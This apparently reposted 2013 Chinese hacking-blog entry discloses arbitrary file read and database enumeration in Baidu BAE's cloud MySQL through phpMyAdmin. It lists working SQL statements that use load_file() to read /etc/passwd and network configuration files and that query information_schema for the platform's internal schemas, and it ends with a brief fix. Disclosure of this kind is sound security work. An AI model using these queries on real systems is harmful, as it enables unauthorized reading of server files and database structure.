记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

百度BAE系列1:数据库信息泄漏、任意文件读取

2013-05-13 10:25

通过一定方式可读取数据库相关内容,查看服务器文件等。

MySQL(云数据库) phpMyAdmin管理时,insert into 表 select load_file('/etc/passwd')等可读取本地文件内容,也可查询information_schema库内容。目测是读和写操作使用了不同的数据库账号。


/* 以下结果是不同的 */
select user();
insert into tmp(data) select user();


/* 一些可执行的操作 */
//文件读取
insert into test(data) select load_file('/etc/passwd');
insert into test(data) select load_file('/etc/issue');
insert into test(data) select load_file('/etc/sysconfig/network-scripts/ifcfg-eth0');
//数据结构读取
insert into test(data) select load_file('/etc/sysconfig/network-scripts/ifcfg-eth1');
insert into test(data) select SCHEMA_NAME from information_schema.SCHEMATA limit 10;
insert into test(data) select concat('databases:',COUNT(*)) from information_schema.SCHEMATA;
insert into test(data) select concat('ibase_bae_code tables:',group_concat(TABLE_NAME)) from information_schema.TABLES where TABLE_SCHEMA='ibase_bae_code';
insert into test(data) select concat('ibase_bae_code.apps columns:',group_concat(COLUMN_NAME)) from information_schema.COLUMNS where TABLE_SCHEMA='ibase_bae_code' AND TABLE_NAME='apps';
insert into test(data) select concat('ibase_bae_code tables:',group_concat(TABLE_NAME)) from information_schema.TABLES where TABLE_SCHEMA='ibase_bae_code';
insert into test(data) select concat('ns_bae_yun_pma tables:',group_concat(TABLE_NAME)) from information_schema.TABLES where TABLE_SCHEMA='ns_bae_yun_pma';
insert into test(data) select concat('ns_bae_yun_pma.pma_session columns:',group_concat(COLUMN_NAME)) from information_schema.COLUMNS where TABLE_SCHEMA='ns_bae_yun_pma' AND TABLE_NAME='pma_session';


 

修复方案:


控制文件和数据库操作权限,修复时注意通过平台上的数据导入也是可以执行的。

知识来源: www.2cto.com/Article/201305/210212.html

阅读:92066 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“百度BAE系列1:数据库信息泄漏、任意文件读取”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于垒土;黑客之术,始于阅读

推广

工具

标签云